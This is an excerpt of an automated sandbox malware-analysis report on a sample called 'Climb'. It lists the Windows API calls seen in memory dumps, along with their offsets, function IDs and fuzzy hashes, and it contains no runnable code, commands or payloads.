                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                          • Opcode ID: 9548bef4cb2e387221cfb434e79e7ec6f91e1e902e187bd1b1334312e9153fad
                                                                                                                                                                          • Instruction ID: 27db242d12968fb16903154ad6bf28d8415c44d3a86481bfa384402890291605
                                                                                                                                                                          • Opcode Fuzzy Hash: 9548bef4cb2e387221cfb434e79e7ec6f91e1e902e187bd1b1334312e9153fad
                                                                                                                                                                          • Instruction Fuzzy Hash: C4310072505325ABCB20EF54D849F9BBBA9FFC5354F00092AF88997191DB30E949CBD2
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 001155F9
                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00115616
                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0011564E
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011566C
                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00115674
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0011567E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                          • Opcode ID: 3ce4d98719d5bc0e2ef80e11a23736c0a2ec58ec9f036387d5d5df239698107b
                                                                                                                                                                          • Instruction ID: 5f448446a78fe649d88db2af81f7445b76dba39be8993feedd2d22c06130206e
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce4d98719d5bc0e2ef80e11a23736c0a2ec58ec9f036387d5d5df239698107b
                                                                                                                                                                          • Instruction Fuzzy Hash: D221F975204600BBEB195B25AC49EFF7BA9DF85750F14803AF809CA191EB65DC81D6A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001262C0
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001263DA
                                                                                                                                                                          • CoCreateInstance.OLE32(00150CC4,00000000,00000001,00150B34,?), ref: 001263F3
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00126411
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                          • API String ID: 3172280962-24824748
                                                                                                                                                                          • Opcode ID: eb7de4c72496d90aca1b12fba6f826a818b1c9f2cca00601579ab10279ca5a2a
                                                                                                                                                                          • Instruction ID: 13f863e78dcb180f65904e9fe38d2fcf0344178bb1f010f36338cd528bbe7fa8
                                                                                                                                                                          • Opcode Fuzzy Hash: eb7de4c72496d90aca1b12fba6f826a818b1c9f2cca00601579ab10279ca5a2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 19D14271A042119FC714DF24D480AAABBF5FF89714F14885DF8899B3A2CB31EC45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00148740
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00148765
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0014877D
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001487A6
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0012C1F2,00000000), ref: 001487C6
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001487B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2294984445-0
                                                                                                                                                                          • Opcode ID: 3726bd5fc664a31935b0cc62fdfe1bb1898749b3386ae219c9b947f2288a7650
                                                                                                                                                                          • Instruction ID: ed009ec419a677b284fb33b2138294c685169b01f8ef64ecda21cc8562586477
                                                                                                                                                                          • Opcode Fuzzy Hash: 3726bd5fc664a31935b0cc62fdfe1bb1898749b3386ae219c9b947f2288a7650
                                                                                                                                                                          • Instruction Fuzzy Hash: 0321AF75610251AFCF189F38DC58A6E3BA5EB8537AF254629F926C35F0EF308890CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000D36E9,000D3355), ref: 000D3700
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000D370E
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000D3727
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,000D36E9,000D3355), ref: 000D3779
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 9581f8e16a7a9d7b36232d35683bb73a7d16676c70431e2cc2ef48361f0642ff
                                                                                                                                                                          • Instruction ID: a72195be1dfbf64154c7cec6549d7ce2db15c8bbc7a627f904a4630eb6f69e12
                                                                                                                                                                          • Opcode Fuzzy Hash: 9581f8e16a7a9d7b36232d35683bb73a7d16676c70431e2cc2ef48361f0642ff
                                                                                                                                                                          • Instruction Fuzzy Hash: B00124F661EB112EA6B427B8BCC65AB2AF4FF05771720122BF014503F2EF114D829162
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,000D4D53,00000000,?,?,000D68E2,?,?,00000000), ref: 000E30EB
                                                                                                                                                                          • _free.LIBCMT ref: 000E311E
                                                                                                                                                                          • _free.LIBCMT ref: 000E3146
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 000E3153
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 000E315F
                                                                                                                                                                          • _abort.LIBCMT ref: 000E3165
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: 995b5fd1f1088945496ff7e1e3754c6dd8962ddbbfba1866dcd4b7ce78246e25
                                                                                                                                                                          • Instruction ID: 9bf5cd665731ba4c137f7ccfee36d315a616b9c027827732567dda9f3bb69ca1
                                                                                                                                                                          • Opcode Fuzzy Hash: 995b5fd1f1088945496ff7e1e3754c6dd8962ddbbfba1866dcd4b7ce78246e25
                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF0A9765445843EC6116737BC0EA9E1AA9AFC1770B21056CFA14B32E3EE218A424161
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1F87
                                                                                                                                                                            • Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1F96
                                                                                                                                                                            • Part of subcall function 000B1F2D: BeginPath.GDI32(?), ref: 000B1FAD
                                                                                                                                                                            • Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1FD6
                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001494AA
                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 001494BE
                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001494CC
                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 001494DC
                                                                                                                                                                          • EndPath.GDI32(?), ref: 001494EC
                                                                                                                                                                          • StrokePath.GDI32(?), ref: 001494FC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                          • Opcode ID: fcb416664f0b51377a1212b957907bd717f7d51414f018d768a3a30edf6e5dd7
                                                                                                                                                                          • Instruction ID: a9131625dacb1a2427ee2b26cd813a201db8a42bbae346b427a3c039cc891dd9
                                                                                                                                                                          • Opcode Fuzzy Hash: fcb416664f0b51377a1212b957907bd717f7d51414f018d768a3a30edf6e5dd7
                                                                                                                                                                          • Instruction Fuzzy Hash: 70110976000109BFDF029F90EC88EEA7F6DEB09364F048021FE194A571C7719E95DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00115B7C
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00115B8D
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00115B94
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00115B9C
                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00115BB3
                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00115BC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: cb6ca5ce0662879bba1fa992528267a73322285d954a5302a35db9c780738272
                                                                                                                                                                          • Instruction ID: b3d5251a142a48638c578a1204fbeb5e2d2132c9c0fb7643d837c2cd6e541f50
                                                                                                                                                                          • Opcode Fuzzy Hash: cb6ca5ce0662879bba1fa992528267a73322285d954a5302a35db9c780738272
                                                                                                                                                                          • Instruction Fuzzy Hash: 61014475E00718BBEF149FA59C49E4E7F79EB49751F004065FA09A7290D6709C41CB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000B32AF
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 000B32B7
                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000B32C2
                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000B32CD
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 000B32D5
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 000B32DD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                          • Opcode ID: c8435ea48c7baa7b3d7fb2c54beb8a6b7ed5eb2ee28b3c81fb9e788a883536c7
                                                                                                                                                                          • Instruction ID: a89e63e29c009da6e446c4c903fc7d3b63f2150d0f042815bc138f0ede14f0d4
                                                                                                                                                                          • Opcode Fuzzy Hash: c8435ea48c7baa7b3d7fb2c54beb8a6b7ed5eb2ee28b3c81fb9e788a883536c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 10016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0011F447
                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0011F45D
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0011F46C
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0011F47B
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0011F485
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0011F48C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                          • Opcode ID: 7494bf62c6973cff2bfeef7a346cfd780d7e4d9dc7aeeb3b61a84d655a8f6d59
                                                                                                                                                                          • Instruction ID: 4db25173eaed03526b6367109fd149af72fdf7e6e8d381d38222f5a6dda45076
                                                                                                                                                                          • Opcode Fuzzy Hash: 7494bf62c6973cff2bfeef7a346cfd780d7e4d9dc7aeeb3b61a84d655a8f6d59
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF03076241158BBEB215B52AC0EEEF3B7CEFC7B11F000058FA05914A0D7A45A81C6B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?), ref: 000F34EF
                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 000F3506
                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 000F3512
                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 000F3521
                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 000F3533
                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 000F354D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                          • Opcode ID: 1de09c32ebf80990a0745514222dce053e2ac6bf844930ec293afc6b6f01f324
                                                                                                                                                                          • Instruction ID: 4b62e4f740f94dc71584b5d4165121c789e4f28cfb6bb5eeac647856b9f4d971
                                                                                                                                                                          • Opcode Fuzzy Hash: 1de09c32ebf80990a0745514222dce053e2ac6bf844930ec293afc6b6f01f324
                                                                                                                                                                          • Instruction Fuzzy Hash: C4012835600509EFDF515BA4EC08BE97BB1FB49721F510560FA1AA25B1CB311E91AB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001121CC
                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 001121D8
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001121E1
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001121E9
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001121F2
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001121F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                          • Opcode ID: 39c9273071e6247945c2a2b6a6622399eb2d7b98da2f4098644af7f421c3fd22
                                                                                                                                                                          • Instruction ID: 5ee63f8d75f483ad9dd93d4119c9979fa16367bc26354172a24e84b6938065d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 39c9273071e6247945c2a2b6a6622399eb2d7b98da2f4098644af7f421c3fd22
                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE09ABA104505BFDF011FA5FC0DD4ABF79FF4A722B514625F62982870CB3294A1DB51
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011CF99
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011CFE0
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011D047
                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0011D075
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1227352736-4108050209
                                                                                                                                                                          • Opcode ID: 87fa647033d1725fdcb8338ed26e25003c57bacc0677633e9494d97be62be8fb
                                                                                                                                                                          • Instruction ID: b4125b3a865a2cc2e76fff48d2c298c3c7992a204df4aab998c7862a4c57bb30
                                                                                                                                                                          • Opcode Fuzzy Hash: 87fa647033d1725fdcb8338ed26e25003c57bacc0677633e9494d97be62be8fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 6751D3716043019BD719AF28E845BEBB7E8AF49354F040A3DF995D3291DB70CD86CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0013B903
                                                                                                                                                                            • Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF
                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 0013B998
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013B9C7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
